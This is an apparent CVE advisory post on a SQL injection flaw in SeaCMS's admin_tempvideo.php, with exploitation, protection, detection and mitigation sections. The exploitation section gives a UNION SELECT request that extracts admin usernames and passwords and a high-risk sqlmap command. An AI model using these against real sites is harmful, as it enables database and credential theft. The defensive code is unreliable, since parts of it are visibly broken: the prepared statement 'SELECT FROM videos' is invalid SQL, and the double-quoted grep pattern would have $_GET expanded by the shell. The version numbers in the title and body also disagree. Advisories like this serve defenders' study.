SeaCMS v133, SQL Injection, CVE-2025-29647 (Critical)

How the CVE Works:

CVE-2025-29647 is a SQL injection flaw in SeaCMS v13.3’s `admin_tempvideo.php` component. Attackers exploit improper input sanitization in HTTP parameters, allowing malicious SQL queries to execute. The vulnerability occurs when user-supplied data is directly concatenated into SQL statements without validation. This enables unauthorized database access, data exfiltration, or admin privilege escalation. The attack vector is network-based, requiring no authentication, and can be triggered via crafted HTTP requests.

DailyCVE Form:

Platform: SeaCMS
Version: v13.3
Vulnerability: SQL Injection
Severity: Critical
Date: 04/08/2025

What Undercode Say:

Exploitation:

1. Craft a malicious payload:

GET /admin_tempvideo.php?id=1%20UNION%20SELECT%201,2,3,4,5,CONCAT(username,0x3a,password),7,8,9,10%20FROM%20admin_table-- HTTP/1.1

2. Use automated tools like `sqlmap`:

sqlmap -u "http://target/admin_tempvideo.php?id=1" --risk=3 --level=5

Protection:

1. Patch: Apply vendor updates.

2. Sanitize inputs:

$id = mysqli_real_escape_string($conn, $_GET['id']);

3. Use prepared statements:

$stmt = $conn->prepare("SELECT FROM videos WHERE id = ?");
$stmt->bind_param("i", $_GET['id']);

4. WAF rules: Block suspicious SQL patterns.

5. Log monitoring: Detect repeated injection attempts.

Analytics:

  • Attack Surface: Remote, high prevalence.
  • Exploitability: Trivial with public PoCs.
  • Impact: Full database compromise.

Detection:

grep -r "mysql_query.$_GET" /var/www/seacms/

Mitigation:

location ~ admin_tempvideo.php {
deny all;
}

References:

Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-29647
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top